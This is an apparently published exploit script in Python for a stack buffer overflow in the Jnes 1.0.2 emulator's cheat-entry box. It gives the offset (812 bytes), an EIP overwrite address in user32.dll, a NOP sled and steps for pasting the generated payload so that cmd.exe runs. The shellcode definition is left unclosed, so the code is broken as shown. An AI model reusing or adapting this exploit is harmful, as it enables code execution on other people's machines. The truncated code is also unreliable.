#!/usr/bin/env python
# coding: utf-8
# Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow
# Date: 3-11-2017
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: http://www.jabosoft.com/home
# Software Link: http://www.jabosoft.com/categories/3
# Version:v1.0.2.15
# Tested on: Windows 7 Home Premium SP1 SPANISH
# Category: Windows Local Exploit
# How to use: open the emulator load any ROM go to options - cheats - add - Pro-Action Replay
# paste the contents of the open.txt in the box <address>-<value> click on ok
# you will get an error message click on ok close the cheat menu and bum
import struct
fuzzing = open('open.txt','w+')
eip = struct.pack('<I', 0x75744E2B) # (overwrites EIP with the address of user32.dll)
buffer = "A" * 812
nops = "\x90" * 20#Nops
shellcode = ( #cmd.exe Shellcode
fuzzing.write(buffer + eip + nops + shellcode)